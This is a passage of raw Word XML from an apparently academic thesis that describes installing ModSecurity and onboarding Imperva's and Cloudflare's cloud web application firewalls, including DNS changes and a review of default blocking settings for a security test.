    </w:p>
    <w:p w14:paraId="6540F1FE" w14:textId="464E402D" w:rsidR="00614BEF" w:rsidRDefault="00DB0296" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ModSecurity’s WAF is an on-premise WAF, which was installed directly on one of the instances that hosted the site</w:t>
      </w:r>
      <w:r w:rsidR="0098511F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> modsectest.cf.</w:t>
      </w:r>
      <w:r w:rsidR="007820B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installing ModSecurity’s WAF on the instance was direct and simple, using yum install. The package that was installed on the instance was mod_security_crs, which was the WAF along with</w:t>
      </w:r>
      <w:r w:rsidR="00C0549B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP</w:t>
      </w:r>
      <w:r w:rsidR="007820B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ModSecurity’s Core Rule Sets (CRS) enabled. This meant it was not required to download the rules separately. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0A3A3" w14:textId="34AD799E" w:rsidR="009A00F7" w:rsidRDefault="00614BEF" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, ModSecurity’s WAF’s config file was not active. The config file required to be renamed for it to be active, then to ensure that the parameter SecRuleEngine was set to on. </w:t>
      </w:r>
      <w:r w:rsidR="00B607E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Upon completion of the installation</w:t>
      </w:r>
      <w:r w:rsidR="0073649B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and configuration</w:t>
      </w:r>
      <w:r w:rsidR="00B607E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, restart of the httpd service was required to load the rules.</w:t>
      </w:r>
      <w:r w:rsidR="007575FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> No further configuration</w:t>
      </w:r>
      <w:r w:rsidR="00F07E59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> change</w:t>
      </w:r>
      <w:r w:rsidR="007575FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE6B96" w14:textId="4D5DE86B" w:rsidR="0069036F" w:rsidRDefault="00C0549B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Onboarding Imperva’s cloud WAF was an entirely different process.</w:t>
      </w:r>
      <w:r w:rsidR="00143EE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Firstly, it was required to purchase a plan. For this </w:t>
      </w:r>
      <w:r w:rsidR="00C34B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>thesis</w:t>
      </w:r>
      <w:r w:rsidR="00143EE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, the 14-day free trial was used. The free trial was given the same access. Once the account was set up, it was time to onboard the website. The website could be added by clicking on the “Add Website” button found on the portal. </w:t>
      </w:r>
      <w:r w:rsidR="000E0432">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Input the </w:t>
      </w:r>
      <w:r w:rsidR="004E49C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidR="000E0432">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">domain name of the website and the system would then attempt to automatically determine the origin server’s IP address or CNAME by performing a DNS check. If DNS records were not able to be retrieved, the system would request for the required information to be input manually. Otherwise, this process was automatic. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2947E0EA" w14:textId="08633E04" w:rsidR="00C0549B" w:rsidRDefault="000E0432" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Once ready, the system prompted to update the domain’s A records and CNAME</w:t>
      </w:r>
      <w:r w:rsidR="00475DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00475DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Imperva provides each root domain with two A records and the www subdomain with one CNAME record.</w:t>
      </w:r>
      <w:r w:rsidR="00C1560E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This was required to point the traffic to Imperva’s anycast IP addresses.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00825EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Each A record’s IP is an IP address of one of Imperva’s anycast IP addresses. The CNAME, on the other hand, has six anycast IP addresses associated</w:t>
      </w:r>
      <w:r w:rsidR="00622AC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, which means, when connected, the requests would be connected to the IP address of the PoP nearest to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7386BBC5" w14:textId="77777777" w:rsidR="00F07E59" w:rsidRDefault="0069036F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>After the DNS records have been updated and detected by Imperva’s cloud WAF, it would be marked as fully configured. Imperva advises to restrict inbound traffic</w:t>
      </w:r>
      <w:r w:rsidR="00E4361C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the origin server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to allow only Imperva’s public IP addresses to prevent direct access to the origin server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624EE3B6" w14:textId="34464763" w:rsidR="0069036F" w:rsidRDefault="007B0EAC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:r w:rsidR="0069036F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, let’s take a look at the default settings</w:t>
      </w:r>
      <w:r w:rsidR="00362B0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the WAF</w:t>
      </w:r>
      <w:r w:rsidR="00D679F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> relevant to this </w:t>
      </w:r>
      <w:r w:rsidR="00C34B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>thesis</w:t>
      </w:r>
      <w:r w:rsidR="0069036F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D679F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Under the </w:t>
      </w:r>
      <w:r w:rsidR="0032336B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>website settings’ tab, the two setting categories that relevant were Security and WAF. The Security category was the settings for bot access control</w:t>
      </w:r>
      <w:r w:rsidR="00F07E59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figure </w:t>
      </w:r>
      <w:r w:rsidR="00527C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00F07E59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0032336B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. The default options enabled were to allow all good bots such as Google and Pingdom to access the site and to block bad bots such as comment spammers and scanners to access the site.</w:t>
      </w:r>
      <w:r w:rsidR="00F07E59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> These were good settings enabled and were left as it was.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100FF7AB" w14:textId="417C2683" w:rsidR="0032336B" w:rsidRDefault="0032336B" w:rsidP="005B7740">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7750396D" wp14:editId="2C76440B">
            <wp:extent cx="5731510" cy="19653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65325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE37E5" w14:textId="3FE69A22" w:rsidR="005B7740" w:rsidRDefault="005B7740" w:rsidP="005B7740">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc71138528"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Imperva bot access control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> default settings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="347B265F" w14:textId="7856DB89" w:rsidR="00F07E59" w:rsidRDefault="000F784F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Next, we will take a look at the WAF category</w:t>
      </w:r>
      <w:r w:rsidR="00D30E4C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as seen in Figure x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. By default, backdoor protect was set as auto-quarantine, DDoS as automatic, while remote file inclusion, SQL injection, cross site scripting (XSS) and illegal resource access were set as alert only</w:t>
      </w:r>
      <w:r w:rsidR="00527C80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figure 11)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00173908">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alert only meant that such threat</w:t>
      </w:r>
      <w:r w:rsidR="004A3A5A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00173908">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> would be detected but it would only be alerted</w:t>
      </w:r>
      <w:r w:rsidR="00931734">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the users</w:t>
      </w:r>
      <w:r w:rsidR="00173908">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC3350">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>but</w:t>
      </w:r>
      <w:r w:rsidR="00173908">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> not be blocked. This was not suitable for this </w:t>
      </w:r>
      <w:r w:rsidR="00C34B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>thesis</w:t>
      </w:r>
      <w:r w:rsidR="00173908">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CB6AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> It was required in this </w:t>
      </w:r>
      <w:r w:rsidR="00C34B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">thesis </w:t>
      </w:r>
      <w:r w:rsidR="00CB6AB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>for the WAF to block the threat when it is detected.</w:t>
      </w:r>
      <w:r w:rsidR="00275ACF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Imperva’s cloud WAF provided a few action options – alert only, block request, block user, block IP and ignore. All those with default option set as alert only were changed to block request.</w:t>
      </w:r>
      <w:r w:rsidR="00337FBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> With </w:t>
      </w:r>
      <w:r w:rsidR="00E13FB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="00337FBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, Imperva’s cloud WAF was fully configured for security test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB041FD" w14:textId="47742D57" w:rsidR="00275ACF" w:rsidRDefault="00275ACF" w:rsidP="00654AF6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F2C9F57" wp14:editId="19EFBF0F">
            <wp:extent cx="5731510" cy="63061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306185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC4A15" w14:textId="31B810F8" w:rsidR="00B0560C" w:rsidRDefault="00B0560C" w:rsidP="00654AF6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc71138529"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B24B9C">
        <w:t xml:space="preserve"> - Imperva </w:t>
      </w:r>
      <w:r>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00B24B9C">
        <w:t xml:space="preserve"> default settings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="06233B74" w14:textId="2C33678A" w:rsidR="007820B0" w:rsidRDefault="005718F0" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloudflare’s cloud WAF’s onboarding was somewhat similar but with some differences. To onboard a website on Cloudflare</w:t>
      </w:r>
      <w:r w:rsidR="00D93889">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, an account would need to firstly be created. After creation and verification of the account, </w:t>
      </w:r>
      <w:r w:rsidR="004E49C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00D93889">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>website could be onboarded by clicking on the “Add site” button and input the root domain of the website.</w:t>
      </w:r>
      <w:r w:rsidR="004E49C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cloudflare would then attempt to automatically resolve the website’s DNS records. If it is unable to resolve, the system would then request to input the details manually. </w:t>
      </w:r>
      <w:r w:rsidR="00347C5A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Once this step is completed, the next step would be to select and </w:t>
      </w:r>
      <w:r w:rsidR="00347C5A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">purchase the plan for the website. For this </w:t>
      </w:r>
      <w:r w:rsidR="00C34B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>thesis</w:t>
      </w:r>
      <w:r w:rsidR="00347C5A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, the Pro plan was selected as it was the most basic plan with WAF functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782CCF4" w14:textId="739C5ADF" w:rsidR="005A0A91" w:rsidRDefault="005A0A91" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To complete the onboarding, unlike Imperva’s cloud WAF, Cloudflare did not provide with A records and CNAME record. Instead, Cloudflare requested for the domain’s DNS records to be updated with the two NS records provided.</w:t>
      </w:r>
      <w:r w:rsidR="00F1469C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once done with updating of the records, the final step was to activate the website on Cloudflare’s portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50571E43" w14:textId="38B51064" w:rsidR="00667D55" w:rsidRDefault="0004032A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">With the onboarding completed, we will now take a look at Cloudflare’s cloud WAF’s default settings with relevance to this </w:t>
      </w:r>
      <w:r w:rsidR="00C34B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>thesis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D92C38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Under the firewall tab, the category that had relevance with this </w:t>
      </w:r>
      <w:r w:rsidR="00C34B1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">thesis </w:t>
      </w:r>
      <w:r w:rsidR="00D92C38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>was “Managed Rules”. The WAF option was enabled by default</w:t>
      </w:r>
      <w:r w:rsidR="005D7AA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and had the option to be disabled</w:t>
      </w:r>
      <w:r w:rsidR="00D92C38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. Cloudflare also had a list of their managed ruleset with the option to enable or disable each rule group</w:t>
      </w:r>
      <w:r w:rsidR="00D81CD4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as seen in Figure </w:t>
      </w:r>
      <w:r w:rsidR="00E56A10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00D92C38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. There were 10 rule groups under the managed rules – Cloudflare Drupal, Cloudflare Flash, Cloudflare Joomla, Cloudflare Magento, Cloudflare Miscellaneous, Cloudflare Php, Cloudflare Plone, Cloudflare Specials, Cloudflare Whmcs and Cloudflare WordPress. </w:t>
      </w:r>
      <w:r w:rsidR="0098146A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The rule groups with the mode “On” by default were Cloudflare Flash, Cloudflare Php, Cloudflare Specials and Cloudflare WordPress. The other rule groups were set as “Off” by default.</w:t>
      </w:r>
      <w:r w:rsidR="00541BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> No changes were made to the configurations because Cloudflare’s default action was to block request.</w:t>
      </w:r>
